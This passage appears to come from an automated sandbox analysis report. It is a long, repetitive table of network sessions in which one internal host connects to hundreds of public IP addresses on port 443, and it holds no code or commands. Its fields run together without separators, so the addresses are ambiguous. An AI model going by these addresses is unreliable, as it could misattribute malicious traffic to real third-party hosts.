                                        21038192.168.2.1360912172.213.11.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21039192.168.2.134890053.87.109.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21040192.168.2.1340596130.207.122.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21041192.168.2.135892023.240.12.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21042192.168.2.1353808130.126.214.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21043192.168.2.1335366217.81.49.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21044192.168.2.133741661.36.108.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21045192.168.2.1353388150.255.98.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21046192.168.2.1339046180.69.46.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21047192.168.2.1355474185.188.168.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21048192.168.2.13568949.122.73.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21049192.168.2.1354956181.188.238.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21050192.168.2.135629025.151.155.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21051192.168.2.133379268.216.72.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21052192.168.2.135275250.201.44.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21053192.168.2.1339926141.126.206.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21054192.168.2.1348278164.24.51.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21055192.168.2.1339272116.125.185.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21056192.168.2.135536037.226.125.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21057192.168.2.1360560139.185.186.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21058192.168.2.1354238203.251.195.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21059192.168.2.13416742.208.78.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21060192.168.2.133924882.205.113.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21061192.168.2.1340796172.53.217.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21062192.168.2.1358892196.143.73.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21063192.168.2.1341706202.100.73.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21064192.168.2.1359208177.133.76.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21065192.168.2.134970232.101.87.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21066192.168.2.1335318195.146.111.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21067192.168.2.1352924142.169.50.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21068192.168.2.134154848.79.35.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21069192.168.2.1337066174.6.98.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21070192.168.2.1348628131.229.96.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21071192.168.2.1360936193.226.15.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21072192.168.2.133324495.41.26.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21073192.168.2.1341180132.81.50.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21074192.168.2.134368482.177.199.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21075192.168.2.134132436.58.104.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21076192.168.2.135268412.25.39.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21077192.168.2.134987459.216.29.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21078192.168.2.1360990171.205.85.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21079192.168.2.1350908175.142.172.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21080192.168.2.135048840.23.42.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21081192.168.2.134319238.98.240.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21082192.168.2.135291467.165.241.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21083192.168.2.1341222113.193.79.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21084192.168.2.134810014.250.170.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21085192.168.2.136091099.200.130.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21086192.168.2.136017683.73.108.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21087192.168.2.1340572103.210.231.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21088192.168.2.1356410116.163.186.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21089192.168.2.1345314141.185.240.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21090192.168.2.135186237.239.92.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21091192.168.2.1358466179.171.120.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21092192.168.2.1337920126.145.152.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21093192.168.2.135613647.250.81.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21094192.168.2.134508497.125.172.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21095192.168.2.1358054141.246.183.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21096192.168.2.133959858.130.49.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21097192.168.2.1343310197.53.39.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21098192.168.2.1337014222.103.22.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21099192.168.2.135285485.145.80.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21100192.168.2.1360058187.212.244.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21101192.168.2.1341072115.248.63.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21102192.168.2.1359168123.178.37.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21103192.168.2.1351838162.105.169.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21104192.168.2.1338266191.190.34.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21105192.168.2.1354896126.176.190.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21106192.168.2.1347936157.137.172.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21107192.168.2.135290282.66.116.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21108192.168.2.1348658149.249.138.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21109192.168.2.135227280.6.42.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21110192.168.2.134895277.215.196.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21111192.168.2.1341470112.122.179.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21112192.168.2.1351516140.167.194.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21113192.168.2.1337432212.185.176.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21114192.168.2.1342932139.176.9.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21115192.168.2.1344008140.227.125.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21116192.168.2.1358752180.92.138.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21117192.168.2.135611678.92.63.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21118192.168.2.135341074.171.131.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21119192.168.2.1341690123.70.126.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21120192.168.2.1342078145.110.16.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21121192.168.2.136052672.253.41.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21122192.168.2.1343048126.141.196.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21123192.168.2.1340066160.26.17.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21124192.168.2.1339150218.96.74.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21125192.168.2.13371362.51.0.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21126192.168.2.1345324221.42.119.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21127192.168.2.1355568144.161.96.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21128192.168.2.1358466125.189.210.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21129192.168.2.13466465.107.239.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21130192.168.2.1339370112.56.22.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21131192.168.2.133340034.157.126.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21132192.168.2.1360248194.93.185.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21133192.168.2.134870419.234.241.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21134192.168.2.135071468.185.17.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21135192.168.2.1358908207.213.20.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21136192.168.2.1333922197.75.235.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21137192.168.2.133498098.24.79.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21138192.168.2.135266043.77.157.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21139192.168.2.1349330219.134.115.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21140192.168.2.135155819.9.178.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21141192.168.2.135946637.255.220.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21142192.168.2.133543820.43.206.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21143192.168.2.134846698.220.55.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21144192.168.2.133382248.92.221.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21145192.168.2.134136660.78.252.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21146192.168.2.135873091.52.41.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21147192.168.2.13327784.173.20.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21148192.168.2.1336978170.91.207.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21149192.168.2.135923024.230.198.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21150192.168.2.1337590191.95.36.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21151192.168.2.133573618.198.67.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21152192.168.2.1337064101.58.163.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21153192.168.2.135405237.76.192.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21154192.168.2.134540477.125.15.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21155192.168.2.133938463.12.249.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21156192.168.2.134952865.67.25.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21157192.168.2.133503275.180.63.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21158192.168.2.135864659.200.18.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21159192.168.2.1358048134.90.213.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21160192.168.2.1348602148.0.198.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21161192.168.2.13541925.215.252.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21162192.168.2.134842266.141.211.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21163192.168.2.1341560109.239.120.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21164192.168.2.1358166222.67.139.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21165192.168.2.134462631.183.75.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21166192.168.2.1347190104.7.218.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21167192.168.2.1340716173.230.227.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21168192.168.2.1340108147.67.49.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21169192.168.2.1358398168.30.116.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21170192.168.2.135668053.178.35.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21171192.168.2.134197295.15.213.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21172192.168.2.1339574105.254.195.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21173192.168.2.133920492.163.168.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21174192.168.2.1336878223.250.238.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21175192.168.2.1357284120.76.64.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21176192.168.2.134969241.15.1.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21177192.168.2.1340316110.80.26.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21178192.168.2.1355858121.2.139.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21179192.168.2.1349404134.84.8.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21180192.168.2.1360296217.134.128.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21181192.168.2.1359048223.193.114.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21182192.168.2.1345032132.188.15.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21183192.168.2.1340124134.233.250.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21184192.168.2.1353568161.98.69.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21185192.168.2.135568224.194.154.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21186192.168.2.1340348162.160.28.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21187192.168.2.1344462103.188.61.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21188192.168.2.136075675.242.7.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21189192.168.2.1359430181.210.249.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21190192.168.2.135287095.185.201.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21191192.168.2.134899080.87.116.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21192192.168.2.1354832191.34.192.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21193192.168.2.134115482.67.183.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21194192.168.2.1346968201.214.211.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21195192.168.2.135615873.225.71.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21196192.168.2.135486480.199.164.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21197192.168.2.1357268222.123.159.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21198192.168.2.135475862.23.18.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21199192.168.2.134781634.66.249.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21200192.168.2.13440185.41.248.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21201192.168.2.1334782155.244.178.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21202192.168.2.134668275.68.169.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21203192.168.2.134006684.111.159.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21204192.168.2.1358318109.184.221.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21205192.168.2.135257443.237.78.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21206192.168.2.1347752142.242.126.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21207192.168.2.135527635.169.151.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21208192.168.2.1359332140.130.11.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21209192.168.2.1334962129.251.29.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21210192.168.2.1338726186.109.108.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21211192.168.2.133752220.72.105.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21212192.168.2.135158497.14.181.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21213192.168.2.1356188148.50.135.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21214192.168.2.133295693.142.187.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21215192.168.2.1354682203.177.228.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21216192.168.2.136009085.123.168.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21217192.168.2.134285836.202.20.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21218192.168.2.1344104103.99.45.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21219192.168.2.1354910165.104.58.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21220192.168.2.1356414195.171.39.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21221192.168.2.1339626186.123.34.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21222192.168.2.1351762133.12.230.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21223192.168.2.1339524147.60.118.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21224192.168.2.1345946194.151.48.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21225192.168.2.134445832.0.176.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21226192.168.2.1352378132.24.172.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21227192.168.2.1359682114.170.155.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21228192.168.2.1343406160.29.28.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21229192.168.2.134187431.208.224.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21230192.168.2.1351918156.190.2.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21231192.168.2.1334342184.110.87.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21232192.168.2.133623875.190.107.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21233192.168.2.134358495.130.61.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21234192.168.2.135091086.34.110.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21235192.168.2.134160631.53.192.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21236192.168.2.1355984141.146.129.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21237192.168.2.1349338217.53.70.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21238192.168.2.1335904157.218.9.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21239192.168.2.1346594218.216.202.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21240192.168.2.134802843.229.4.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21241192.168.2.1351632161.223.182.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21242192.168.2.1341404103.232.102.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21243192.168.2.135484081.9.17.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21244192.168.2.134643070.79.128.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21245192.168.2.135469889.167.174.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21246192.168.2.136051884.113.233.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21247192.168.2.1343932151.99.192.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21248192.168.2.1343132153.79.118.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21249192.168.2.1334212107.105.118.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21250192.168.2.1338056201.60.73.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21251192.168.2.1343256199.236.97.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21252192.168.2.136037612.6.207.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21253192.168.2.1351550122.210.245.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21254192.168.2.135511649.63.136.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21255192.168.2.1345778121.219.209.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21256192.168.2.134970837.158.186.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21257192.168.2.1354210212.14.204.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21258192.168.2.1360296166.13.0.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21259192.168.2.1333818181.226.203.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
